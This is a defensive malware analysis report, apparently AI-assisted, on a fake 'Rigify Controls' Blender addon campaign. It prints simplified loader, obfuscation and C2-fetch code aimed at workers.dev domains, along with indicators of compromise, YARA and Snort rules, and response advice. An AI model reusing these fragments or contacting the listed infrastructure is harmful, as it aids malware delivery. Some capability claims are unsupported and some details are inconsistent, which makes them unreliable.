Blender Virus Analysis

1.  
2. ADVANCED MALWARE ANALYSIS: Blender Addon Campaign
3. Analysis Date: June 5, 2025
4. Threat Level: CRITICAL
5. Status: ACTIVE CAMPAIGN
6. EXECUTIVE SUMMARY
7. This analysis covers a sophisticated malware campaign targeting Blender users through malicious addons. The operation demonstrates professional-level development with APT-like characteristics, multiple payload types, and extensive infrastructure.
8. Key Findings:
9.  
10. Multi-stage attack with 21.2MB complete malware platform
11. Professional C2 infrastructure with 20+ backup domains
12. Multiple capabilities: ransomware, keylogger, data theft, remote access
13. Active campaign (confirmed operational June 2025)
14. Russian attribution based on code comments and timestamps
15.  
16. TECHNICAL ANALYSIS
17. Attack Vector
18. Initial Infection: Malicious Blender addon disguised as "Rigify Controls"
19.  
20. File appears as legitimate rigging tools
21. ~500 lines of Python code mixing genuine functionality with malware
22. Uses social engineering: "Install this addon to get the chair model working"
23.  
24. Multi-Stage Execution Flow
25. Stage 1: Blender Addon (Initial Compromise)
26. python# Legitimate UI elements for camouflage
27. class RIGIFY_PT_main_panel(bpy.types.Panel):
28.     bl_label = "FK/IK Controls"
29.     # [Working rigging code omitted for brevity]
30.  
31. # Malicious timer-based execution (simplified)
32. def _defer_execution():
33.     try:
34.         execute_malware_payload()
35.     except NameError:
36.         return 0.1  # Retry every 0.1 seconds
37.     return None
38.  
39. bpy.app.timers.register(_defer_execution)
40. Stage 2: PowerShell Dropper
41.  
42. Downloads 21MB ZIP package from external server
43. Uses legitimate-looking domains on Cloudflare Workers
44. Hidden window execution to avoid user detection
45.  
46. Stage 3: Platform Deployment
47.  
48. Complete Python 3.13 runtime environment (6.1MB)
49. OpenSSL cryptographic libraries (5.2MB)
50. SQLite database system (1.5MB)
51. 20+ Python extension modules (4.2MB)
52.  
53. Stage 4: Malware Operations
54.  
55. Multi-threaded execution with monitoring
56. 30-minute active periods for persistence
57. Base64 + zlib encoded final payloads
58.  
59. Code Analysis Samples
60. Obfuscation Techniques:
61. python# Layer 1: Variable name mangling
62. _x2 = subprocess  # Hide true purpose
63. _x3 = requests    # Obscure network functionality
64.  
65. # Layer 2: String encoding with prefix removal
66. encoded_payload = "ABCDEYWRkb25zMQ==="[5:]  # Skip first 5 chars
67. decoded = base64.b64decode(encoded_payload)
68.  
69. # Layer 3: Multi-layer compression
70. final_payload = zlib.decompress(base64.b64decode(cleaned_script))
71. C2 Communication Pattern:
72. python# Simplified C2 request structure
73. def contact_c2_server():
74.     servers = [decode_server_list()]  # 20+ backup domains
75.     for server in servers:
76.         try:
77.             url = f"https://addons1.{server}.workers.dev/get-link"
78.             response = requests.get(url, headers=fake_browser_headers)
79.             if response.status_code == 200:
80.                 return process_payload(response.json()["link"])
81.         except:
82.             continue  # Try next server
83. Russian Attribution Evidence:
84. python# Russian language comments found in final payload:
85. # Сохраняем оригинальные дескрипторы stdout и stderr
86. # (Saving original stdout and stderr descriptors)
87.  
88. # Определяем пути к файлам логов  
89. # (Defining paths to log files)
90.  
91. # Если файлы уже существуют, удаляем их
92. # (If files already exist, delete them)
93. MALWARE CAPABILITIES
94. Ransomware Module
95.  
96. Encryption: AES-256, RSA-4096 support via OpenSSL
97. Target Files: Documents, images, project files, databases
98. Key Management: Secure key generation with hardware entropy
99. Backup Deletion: Shadow copy removal capabilities
100.  
101. Information Stealer
102.  
103. Browser Data: Passwords, cookies, browsing history, bookmarks
104. System Info: Hardware details via WMI, installed software
105. Network Config: IP addresses, network shares, WiFi credentials
106. Document Harvesting: Selective creative project file targeting
107.  
108. Remote Access Trojan (RAT)
109.  
110. C2 Communication: HTTPS with certificate validation
111. Command Execution: PowerShell and system commands
112. File Operations: Upload/download, directory traversal
113. System Control: Process management, registry access, service control
114.  
115. Keylogger/Surveillance
116.  
117. Input Monitoring: Low-level keyboard/mouse capture
118. Screen Capture: Screenshot functionality
119. Application Tracking: Active window monitoring
120. Media Access: Potential webcam/microphone activation
121.  
122. INFRASTRUCTURE ANALYSIS
123. Command & Control Network
124. Primary Tier Domains:
125.  
126. cloudaddons1987.workers.dev (ACTIVE)
127. poupathockmist1989.workers.dev (BLOCKED)
128. skyaddons2001.workers.dev (OFFLINE)
129. mistaddons1995.workers.dev (OFFLINE)
130.  
131. Secondary Tier: 15+ additional backup domains
132. Hosting: Cloudflare Workers (legitimate service abuse)
133. Protocol: HTTPS with valid certificates
134. Redundancy: Automatic failover mechanisms
135. Network Communication
136. Request Pattern:
137. GET /get-link HTTP/1.1
138. Host: addons1.[domain].workers.dev
139. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
140. Accept: application/json
141.  
142. Response Format:
143. {
144.   "link": "[base64_encoded_powershell_command]"
145. }
146. INDICATORS OF COMPROMISE (IOCs)
147. Network IOCs
148. Malicious IPs:
149.  
150. 66.63.187.113 (primary download server)
151.  
152. Malicious Domains:
153.  
154. *.workers.dev/get-link (URL pattern)
155. addons1.cloudaddons1987.workers.dev (active C2)
156.  
157. Network Signatures:
158.  
159. Large downloads (20+ MB) from workers.dev domains
160. HTTPS POST requests with base64 JSON payloads
161. DNS queries for addon-themed domain names
162.  
163. File IOCs
164. Primary Package:
165.  
166. KursorResourcesV4.zip
167. SHA256: 9113d030d727b05aa1e896d1e8f0187e8f99b579332eff7ba955c989c73aec76
168. Size: 10.95 MB (compressed), 21.2 MB (extracted)
169.  
170. Key Executables:
171.  
172. Gyliver.exe: 084061e07ae200522a756f390e92c6ad7256e486792c81eb3d0f8a5da27b2c0d
173. KursorResourcesV4.exe: [same hash - identical files]
174.  
175. Python Scripts:
176.  
177. Gyliver.py: 6dd9969436730b1400a51a1c33b05d0e17ec2643454db4b292358ceaae8ac0c8
178. kursorV4.py: 632ee5cf287c226342afc6f4d244f287a619644bfa0fc038f4d710c86e7ad214
179.  
180. System IOCs
181. Registry Modifications:
182.  
183. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
184. Gyliver.lnk entries in startup folder
185.  
186. File System Artifacts:
187.  
188. %TEMP%\KursorResourcesV4\ directory
189. %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Gyliver.lnk
190. script_output_1.log, script_output_2.log (execution logs)
191.  
192. DETECTION RULES
193. YARA Rule
194. rule Kursor_Gyliver_Malware {
195.     meta:
196.         description = "Detects Kursor/Gyliver malware family"
197.         author = "Security Research"
198.         date = "2025-06-05"
199.        
200.     strings:
201.         $s1 = "KursorResourcesV4" ascii
202.         $s2 = "Gyliver" ascii
203.         $s3 = "script_output_" ascii
204.         $s4 = "workers.dev/get-link" ascii
205.         $s5 = "pythonmemorymodule" ascii
206.        
207.     condition:
208.         3 of them or filesize > 20MB and 2 of them
209. }
210. Network Detection (Snort)
211. alert tcp any any -> any 443 (msg:"Kursor C2 Communication";
212.     flow:established,to_server; content:"GET"; http_method;
213.     content:"/get-link"; http_uri; content:"workers.dev"; http_header;
214.     sid:1000001; rev:1;)
215. PROTECTION RECOMMENDATIONS
216. Immediate Actions
217.  
218. Network Blocking: Implement IOC-based firewall rules
219. Endpoint Scanning: Deploy YARA rules across all systems
220. User Education: Alert about Blender addon risks
221. Backup Verification: Ensure backup integrity for creative assets
222.  
223. Blender-Specific Security
224. yamlBlender Security Configuration:
225. addon_sources:
226.   - Restrict to official Blender addon repository
227.   - Implement addon code signing verification
228.   - User education on addon installation risks
229.  
230. file_handling:
231.   - Monitor .blend file load operations
232.   - Implement addon execution sandboxing
233.   - Log all addon installation activities
234.   - Disable Auto Run Python Scripts by default
235. Network Defense
236. yamlNetwork Security:
237. dns_filtering:
238.   - Block *.workers.dev/get-link patterns
239.   - Monitor for addon-themed domain requests
240.   - Implement DNS sinkholing for known IOCs
241.  
242. web_filtering:
243.   - Block access to identified malicious IPs
244.   - Monitor large downloads from unknown sources
245.   - Inspect JSON responses for base64 payloads
246. Endpoint Protection
247. yamlEndpoint Security:
248. process_monitoring:
249.   - Monitor PowerShell execution with hidden windows
250.   - Track Python interpreter spawning from temp directories
251.   - Alert on multi-threaded background processes
252.  
253. file_monitoring:
254.   - Monitor Startup folder modifications
255.   - Track large file creations in %TEMP%
256.   - Monitor log file generation patterns
257. INCIDENT RESPONSE
258. Immediate Response Steps
259.  
260. Network Isolation: Disconnect affected systems
261. Process Termination: Kill Python and PowerShell processes
262. File Quarantine: Isolate KursorResourcesV4 directory
263. Backup Assessment: Check for file encryption
264.  
265. Investigation Checklist
266.  
267.  Memory dump for runtime analysis
268.  Network logs review for C2 communication
269.  File system timeline reconstruction
270.  Registry analysis for persistence mechanisms
271.  Browser data examination for credential theft
272.  
273. Recovery Actions
274.  
275. File Restoration: Restore from clean backups if encryption occurred
276. Credential Reset: Reset all passwords and authentication tokens
277. System Hardening: Update security controls and monitoring
278. User Training: Enhanced security awareness for creative teams
279.  
280. ATTRIBUTION ASSESSMENT
281. Technical Indicators
282.  
283. Code Quality: Professional development with error handling
284. Infrastructure: Substantial investment in redundant C2 network
285. Operational Security: Legitimate hosting service abuse
286. Targeting: Specific focus on creative industry
287.  
288. Linguistic Evidence
289.  
290. Russian comments throughout codebase
291. Cyrillic character support in encoding preferences
292. Timezone evidence from file timestamps (Eastern European)
293.  
294. Campaign Characteristics
295.  
296. Long-term operation: 6+ month active campaign
297. Resource investment: 21MB platform development
298. Professional quality: Commercial-grade cryptographic implementation
299. Sophisticated evasion: Multi-layer obfuscation and legitimate hosting
300.  
301. CONCLUSION
302. This malware campaign represents a significant evolution in targeting methodology, specifically focusing on creative professionals who may have different security awareness levels compared to traditional corporate users. The use of functional legitimate tools as camouflage, combined with professional-grade infrastructure and capabilities, makes this a particularly concerning threat.
303. The campaign's success likely depends on the creative community's trust in addon sharing and the perception that creative software is less likely to be targeted by sophisticated attacks. Organizations and individuals in creative industries should prioritize security measures specifically designed for creative software ecosystems.
304. Report compiled with AI assistance for technical documentation efficiency.
305.  
306. DISCLAIMER: This analysis is provided for educational and defensive purposes only. Do not attempt to access or interact with the malicious infrastructure mentioned in this report.
307.  
308. This gives you both a concise Reddit comment and a comprehensive pastebin breakdown that's informative but doesn't include complete malicious code!